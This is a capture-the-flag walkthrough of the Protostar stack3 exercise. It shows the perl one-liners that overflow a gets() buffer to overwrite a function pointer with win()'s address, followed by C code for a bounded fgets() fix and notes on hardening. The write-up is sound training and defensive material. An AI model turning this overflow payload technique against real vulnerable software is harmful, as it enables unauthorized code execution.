Introduction
Protostar is a set of CTF-style exercises on Linux binary exploitation that get progressively harder. An ISO containing the OS and the challenges can be downloaded.
The website with all information and downloads is at https://exploit-exercises.com/protostar/
Challenge
Test run
user@protostar:~$ /opt/protostar/bin/stack3
Exploit
Make the program respond with the message “code flow successfully changed”.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();   /* function pointer that sits on the stack next to buffer */
  char buffer[64];

  fp = 0;

  gets(buffer);           /* no bounds check: a long line overruns buffer into fp */

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}
We can see that the message is printed by win(), so the challenge is to change the flow of the program such that the function pointer fp holds the memory location of win().
First off we use the same trick as in the previous challenges: corrupt the stack by feeding data through stdin into the 64-byte variable “buffer”, which gets() fills without any length check.
Let’s see if we can crash the program
user@protostar:~$ perl -e 'print "A"x65'|/opt/protostar/bin/stack3
calling function pointer, jumping to 0x00000041
Segmentation fault
Our A’s (0x41) overwrote fp: the 65th byte landed in its lowest byte, and calling address 0x00000041 caused the segmentation fault.
In order to fill fp with the memory location of win() we need to examine the program using objdump (this hint is on the protostar site).
user@protostar:~$ objdump -d /opt/protostar/bin/stack3 |grep -A 10 win
08048424 <win>:
 8048424:       55                      push   %ebp
 8048425:       89 e5                   mov    %esp,%ebp
 8048427:       83 ec 18                sub    $0x18,%esp
 804842a:       c7 04 24 40 85 04 08    movl   $0x8048540,(%esp)
 8048431:       e8 2a ff ff ff          call   8048360 <puts@plt>
 8048436:       c9                      leave
 8048437:       c3                      ret
After running objdump and grepping for win we can see that its memory location is “08048424”.
Let’s fill buffer with 64 bytes of padding and then overwrite fp with that address in reverse (little-endian) byte order, “0x24840408”, i.e. the bytes \x24\x84\x04\x08.
user@protostar:~$ perl -e 'print "A"x64 . "\x24\x84\x04\x08"'|/opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
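As an added example (not part of the original writeup or of the Protostar source), the C below shows the two things the walkthrough relies on from a defender's side: why the address is written as 24 84 04 08 (little-endian storage on x86), and how the bug is closed by replacing gets(buffer) with a bounded fgets() read. The function names, the tmpfile()-backed stand-in for stdin and the constructed 68-byte sample input are my own assumptions, not anything from the challenge binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same buffer size as the challenge binary */

/* Hardened replacement for the gets(buffer) call: fgets() stops after
 * cap-1 bytes, so input longer than the buffer is truncated instead of
 * spilling into whatever sits above it on the stack (fp, saved EBP, the
 * return address). Leftover bytes of an over-long line are drained so
 * they cannot be mistaken for the next line of input.
 * Returns the number of bytes kept (newline stripped), or 0 at EOF. */
size_t read_line_bounded(FILE *in, char *buffer, size_t cap)
{
    if (cap == 0 || fgets(buffer, (int)cap, in) == NULL) {
        if (cap) buffer[0] = '\0';
        return 0;
    }
    size_t len = strlen(buffer);
    if (len > 0 && buffer[len - 1] == '\n') {
        buffer[--len] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n') { /* discard */ }
    }
    return len;
}

/* Feed an in-memory byte string through read_line_bounded() as if it were
 * stdin (a stand-in for the pipe in the writeup) and report how many bytes
 * ended up in a BUF_SIZE buffer. tmpfile() keeps this portable C. */
size_t hardened_read_len(const char *input, size_t input_len)
{
    char buffer[BUF_SIZE];
    FILE *in = tmpfile();
    if (in == NULL) return (size_t)-1;
    fwrite(input, 1, input_len, in);
    rewind(in);
    size_t kept = read_line_bounded(in, buffer, sizeof buffer);
    fclose(in);
    return kept;
}

/* Constructed sample input mirroring the writeup's pipe: 64 filler bytes
 * followed by the four address bytes. Returns the sample length (68). */
size_t build_sample_input(unsigned char *out, size_t cap)
{
    const unsigned char addr_le[4] = { 0x24, 0x84, 0x04, 0x08 };
    if (cap < 64 + 4) return 0;
    memset(out, 'A', 64);
    memcpy(out + 64, addr_le, 4);
    return 68;
}

/* Encode a 32-bit value as the four bytes an x86 process stores it in
 * memory (little-endian), which is why 0x08048424 becomes 24 84 04 08. */
void le32(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

int main(void)
{
    unsigned char sample[80];
    size_t n = build_sample_input(sample, sizeof sample);
    printf("input bytes: %zu, bytes kept by bounded read: %zu\n",
           n, hardened_read_len((const char *)sample, n));
    unsigned char b[4];
    le32(0x08048424u, b);
    printf("0x08048424 in memory: %02x %02x %02x %02x\n", b[0], b[1], b[2], b[3]);
    return 0;
}
```

With the bounded read, the same 68-byte input that flips fp in the challenge binary is cut to 63 bytes and fp stays zero, so the "if(fp)" branch is never taken. The remaining hardening the page's toolchain can add on top of this is to compile with stack protection and build the binary position-independent, so that even a remaining overflow has no fixed address such as 0x08048424 to aim at.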
Thank you